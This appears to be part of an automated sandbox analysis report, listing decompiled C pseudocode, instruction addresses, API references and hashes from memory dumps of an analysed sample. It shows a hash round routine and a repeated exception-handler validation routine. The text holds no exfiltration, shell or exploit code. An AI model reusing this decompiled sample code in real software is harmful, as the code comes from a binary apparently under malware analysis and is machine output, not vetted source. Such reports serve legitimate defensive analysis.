				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}

0x001d1b6d
0x001d1b78
0x001d1b7b
0x001d1b7e
0x001d1b7f
0x001d1b9d
0x001d1b9f
0x001d1ba2
0x001d1ba5
0x001d1ba5
0x001d1ba8
0x001d1ba8
0x001d1bab
0x001d1bab
0x001d1bae
0x001d1bae
0x001d1bcb
0x001d1bce
0x001d1be4
0x001d1be7
0x001d1c01
0x001d1c04
0x001d1c1a
0x001d1c1d
0x001d1c1f
0x001d1c37
0x001d1c3a
0x001d1c3d
0x001d1c55
0x001d1c58
0x001d1c72
0x001d1c75
0x001d1c8b
0x001d1c8e
0x001d1c90
0x001d1ca8
0x001d1cad
0x001d1cb0
0x001d1cc6
0x001d1cc9
0x001d1ce3
0x001d1ce6
0x001d1cfc
0x001d1cff
0x001d1d01
0x001d1d1c
0x001d1d1f
0x001d1d36
0x001d1d39
0x001d1d3d
0x001d1d56
0x001d1d59
0x001d1d5b
0x001d1d5e
0x001d1d79
0x001d1d7c
0x001d1d95
0x001d1d98
0x001d1da8
0x001d1dab
0x001d1dc3
0x001d1dc6
0x001d1de0
0x001d1de3
0x001d1dfb
0x001d1dfe
0x001d1e14
0x001d1e17
0x001d1e2f
0x001d1e32
0x001d1e4a
0x001d1e4d
0x001d1e67
0x001d1e6a
0x001d1e80
0x001d1e83
0x001d1e9b
0x001d1e9e
0x001d1eb8
0x001d1ebb
0x001d1ed3
0x001d1ed6
0x001d1eec
0x001d1eef
0x001d1f07
0x001d1f0a
0x001d1f22
0x001d1f25
0x001d1f37
0x001d1f3a
0x001d1f4c
0x001d1f4f
0x001d1f61
0x001d1f64
0x001d1f68
0x001d1f78
0x001d1f7b
0x001d1f89
0x001d1f8c
0x001d1f9e
0x001d1fa1
0x001d1fb5
0x001d1fb8
0x001d1fba
0x001d1fca
0x001d1fcd
0x001d1fdf
0x001d1fe2
0x001d1ff0
0x001d1ff3
0x001d2005
0x001d2008
0x001d200c
0x001d201c
0x001d201f
0x001d2031
0x001d2034
0x001d2042
0x001d2045
0x001d2057
0x001d205a
0x001d206c
0x001d206f
0x001d2083
0x001d2086
0x001d209a
0x001d209d
0x001d20b1
0x001d20b4
0x001d20c8
0x001d20cb
0x001d20df
0x001d20e2
0x001d20f6
0x001d20fb
0x001d210d
0x001d2110
0x001d2124
0x001d2127
0x001d213b
0x001d213e
0x001d2154
0x001d2157
0x001d216b
0x001d216e
0x001d2180
0x001d2183
0x001d2197
0x001d219a
0x001d21ae
0x001d21b1
0x001d21c5
0x001d21ce
0x001d21d1
0x001d21da
0x001d21e3
0x001d21eb
0x001d21f3
0x001d21fd
0x001d2212

APIs

memset.NTDLL ref: 001D2206

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 1ecd0f12299eb9d0803f691a3c12a2792b72d9f55958800bd631e02db9d83322
Instruction ID: 1997cb3f2827cd76269e35d59b5b4f5d521de884dc67b78ccc0287a482dfa6af
Opcode Fuzzy Hash: 1ecd0f12299eb9d0803f691a3c12a2792b72d9f55958800bd631e02db9d83322
Instruction Fuzzy Hash: 7C22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2423A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E2423A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e244178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e2441c0 = 1;
										__eflags =  *0x6e2441c0;
										if( *0x6e2441c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6e244178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e2441c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e244178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e244180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e24417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e244180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e244180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e2441c0 = 1;
							__eflags =  *0x6e2441c0;
							if( *0x6e2441c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e244180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e244180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e2441c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e244180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e244178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e244180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e244180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e2423af
0x6e2423b2
0x6e2423b8
0x6e2423d6
0x00000000
0x6e2423d6
0x6e2423c0
0x6e2423c9
0x6e2423cf
0x6e2423de
0x6e2423e1
0x6e2423e4
0x6e2423ee
0x6e2423ee
0x6e2423f0
0x6e2423f3
0x6e2423f5
0x6e2423f5
0x6e2423f7
0x6e2423fa
0x00000000
0x00000000
0x6e2423fc
0x6e2423fe
0x6e242464
0x6e242464
0x6e2425c2
0x00000000
0x6e2425c2
0x6e242400
0x6e242400
0x6e242404
0x6e242406
0x6e242406
0x6e242406
0x6e242406
0x6e242409
0x6e24240a
0x6e24240d
0x6e24240d
0x6e242411
0x6e242415
0x6e242423
0x6e242423
0x6e24242b
0x6e242431
0x6e242433
0x6e242435
0x6e242445
0x6e242452
0x6e242456
0x6e24245b
0x6e24245d
0x6e2424db
0x6e2424db
0x6e24245f
0x6e24245f
0x6e24245f
0x6e2424dd
0x6e2424df
0x6e2425c0
0x6e2425c0
0x00000000
0x6e2424e5
0x6e2424e5
0x6e2424ec
0x00000000
0x00000000
0x6e2424f2
0x6e2424f6
0x6e242552
0x6e242554
0x6e24255c
0x6e24255e
0x6e242560
0x00000000
0x00000000
0x6e242562
0x6e242568
0x6e24256a
0x6e24256c
0x6e242581
0x6e242581
0x6e242583
0x6e2425b2
0x6e2425b9
0x00000000
0x6e2425b9
0x6e242587
0x6e242588
0x6e24258a
0x6e24258c
0x6e24258c
0x6e24258e
0x6e242590
0x6e242592
0x6e2425a6
0x6e2425a6
0x6e2425a9
0x6e2425ab
0x6e2425ab
0x6e2425ac
0x6e2425ac
0x00000000
0x6e242594
0x6e242594
0x6e242594
0x6e24259d
0x6e24259e
0x6e2425a0
0x6e2425a2
0x6e2425a2
0x00000000
0x6e242594
0x6e242592
0x6e24256e
0x6e242575
0x6e242575
0x6e242577
0x00000000
0x00000000
0x6e242579
0x6e24257a
0x6e24257d
0x6e24257f
0x00000000
0x00000000
0x00000000
0x6e24257f
0x00000000
0x6e242575
0x6e2424f8
0x6e2424fb
0x6e242500
0x00000000
0x00000000
0x6e242509
0x6e24250b
0x6e242511
0x00000000
0x00000000
0x6e242517
0x6e24251d
0x00000000
0x00000000
0x6e242523
0x6e242525
0x6e24252e
0x6e242532
0x00000000
0x00000000
0x6e242538
0x6e24253b
0x6e24253d
0x00000000
0x00000000
0x6e242544
0x6e242546
0x00000000
0x00000000
0x6e242548
0x6e24254c
0x00000000
0x00000000
0x00000000
0x6e24254c
0x00000000
0x00000000
0x00000000
0x6e242437
0x6e242437
0x6e242437
0x6e24243e
0x00000000
0x00000000
0x6e242440
0x6e242441
0x6e242443
0x00000000
0x00000000
0x00000000
0x6e242443
0x6e24246b
0x6e24246d
0x00000000
0x00000000
0x6e24247d
0x6e24247f
0x6e242481
0x00000000
0x00000000
0x6e242487
0x6e24248e
0x6e2424ba
0x6e2424ba
0x6e2424bc
0x6e2424be
0x6e2424d2
0x6e2424d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2424c0
0x6e2424c0
0x6e2424c0
0x6e2424c9
0x6e2424ca
0x6e2424cc
0x6e2424ce
0x6e2424ce
0x00000000
0x6e2424c0
0x6e242490
0x6e242493
0x6e242495
0x6e2424a7
0x6e2424a7
0x6e2424aa
0x6e2424ac
0x6e2424ac
0x6e2424ad
0x6e2424ad
0x6e2424b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e242497
0x6e242497
0x6e242497
0x6e24249e
0x00000000
0x00000000
0x6e2424a0
0x6e2424a0
0x6e2424a1
0x00000000
0x00000000
0x00000000
0x6e2424a1
0x6e2424a3
0x6e2424a5
0x6e2424b8
0x00000000
0x00000000
0x00000000
0x6e2424b8
0x00000000
0x6e2424a5
0x6e242417
0x6e24241a
0x6e24241d
0x00000000
0x00000000
0x6e24241f
0x6e242421
0x00000000
0x00000000
0x00000000
0x6e242421
0x6e2423e6
0x6e2423e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E242456

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 3749f90489161342130d29cacf5086b3b0ed7cf7d46fa9d4767ebdcdb8552f92
Instruction ID: 84c12721b237ee1db9367d045dbb4232dec5c407d70a88b65e3855909b44c3f4
Opcode Fuzzy Hash: 3749f90489161342130d29cacf5086b3b0ed7cf7d46fa9d4767ebdcdb8552f92
Instruction Fuzzy Hash: 9161C1F2614A0FCFEB5DCFABD8A0A5977B7EB45355B248428D816C7184FB30D882C660

Uniqueness

Uniqueness Score: -1.00%

Function 001DB2F1, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001DB2F1(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x1dd2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x1dd328 = 1;
										__eflags =  *0x1dd328;
										if( *0x1dd328 != 0) {
											goto L60;
										}
										_t84 =  *0x1dd2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x1dd328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x1dd2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x1dd2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1dd2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x1dd328 = 1;
							__eflags =  *0x1dd328;
							if( *0x1dd328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x1dd328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x1dd2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x1dd2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1dd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x001db2fb
0x001db2fe
0x001db304
0x001db322
0x00000000
0x001db322
0x001db30c
0x001db315
0x001db31b
0x001db32a
0x001db32d
0x001db330
0x001db33a
0x001db33a
0x001db33c
0x001db33f
0x001db341
0x001db341
0x001db343
0x001db346
0x00000000
0x00000000
0x001db348
0x001db34a
0x001db3b0
0x001db3b0
0x001db50e
0x00000000
0x001db50e
0x001db34c
0x001db34c
0x001db350
0x001db352
0x001db352
0x001db352
0x001db352
0x001db355
0x001db356
0x001db359
0x001db359
0x001db35d
0x001db361
0x001db36f
0x001db36f
0x001db377
0x001db37d
0x001db37f
0x001db381
0x001db391
0x001db39e
0x001db3a2
0x001db3a7
0x001db3a9
0x001db427
0x001db427
0x001db3ab
0x001db3ab
0x001db3ab
0x001db429
0x001db42b
0x001db50c
0x001db50c
0x00000000
0x001db431
0x001db431
0x001db438
0x00000000
0x00000000
0x001db43e
0x001db442
0x001db49e
0x001db4a0
0x001db4a8
0x001db4aa
0x001db4ac
0x00000000
0x00000000
0x001db4ae
0x001db4b4
0x001db4b6
0x001db4b8
0x001db4cd
0x001db4cd
0x001db4cf
0x001db4fe
0x001db505
0x00000000
0x001db505
0x001db4d3
0x001db4d4
0x001db4d6
0x001db4d8
0x001db4d8
0x001db4da
0x001db4dc
0x001db4de
0x001db4f2
0x001db4f2
0x001db4f5
0x001db4f7
0x001db4f7
0x001db4f8
0x001db4f8
0x00000000
0x001db4e0
0x001db4e0
0x001db4e0
0x001db4e9
0x001db4ea
0x001db4ec
0x001db4ee
0x001db4ee
0x00000000
0x001db4e0
0x001db4de
0x001db4ba
0x001db4c1
0x001db4c1
0x001db4c3
0x00000000
0x00000000
0x001db4c5
0x001db4c6
0x001db4c9
0x001db4cb
0x00000000
0x00000000
0x00000000
0x001db4cb
0x00000000
0x001db4c1
0x001db444
0x001db447
0x001db44c
0x00000000
0x00000000
0x001db455
0x001db457
0x001db45d
0x00000000
0x00000000
0x001db463
0x001db469
0x00000000
0x00000000
0x001db46f
0x001db471
0x001db47a
0x001db47e
0x00000000
0x00000000
0x001db484
0x001db487
0x001db489
0x00000000
0x00000000
0x001db490
0x001db492
0x00000000
0x00000000
0x001db494
0x001db498
0x00000000
0x00000000
0x00000000
0x001db498
0x00000000
0x00000000
0x00000000
0x001db383
0x001db383
0x001db383
0x001db38a
0x00000000
0x00000000
0x001db38c
0x001db38d
0x001db38f
0x00000000
0x00000000
0x00000000
0x001db38f
0x001db3b7
0x001db3b9
0x00000000
0x00000000
0x001db3c9
0x001db3cb
0x001db3cd
0x00000000
0x00000000
0x001db3d3
0x001db3da
0x001db406
0x001db406
0x001db408
0x001db40a
0x001db41e
0x001db420
0x00000000
0x00000000
0x00000000
0x00000000
0x001db40c
0x001db40c
0x001db40c
0x001db415
0x001db416
0x001db418
0x001db41a
0x001db41a
0x00000000
0x001db40c
0x001db3dc
0x001db3dc
0x001db3df
0x001db3e1
0x001db3f3
0x001db3f3
0x001db3f6
0x001db3f8
0x001db3f8
0x001db3f9
0x001db3f9
0x001db3ff
0x001db3ff
0x00000000
0x00000000
0x00000000
0x00000000
0x001db3e3
0x001db3e3
0x001db3e3
0x001db3ea
0x00000000
0x00000000
0x001db3ec
0x001db3ec
0x001db3ed
0x00000000
0x00000000
0x00000000
0x001db3ed
0x001db3ef
0x001db3f1
0x001db404
0x00000000
0x00000000
0x00000000
0x001db404
0x00000000
0x001db3f1
0x001db363
0x001db366
0x001db369
0x00000000
0x00000000
0x001db36b
0x001db36d
0x00000000
0x00000000
0x00000000
0x001db36d
0x001db332
0x001db334
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 001DB3A2

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 45cb675d8c484d481f01a33e02f433d40c83f97fe9d38c95d3e04eba8e8989dd
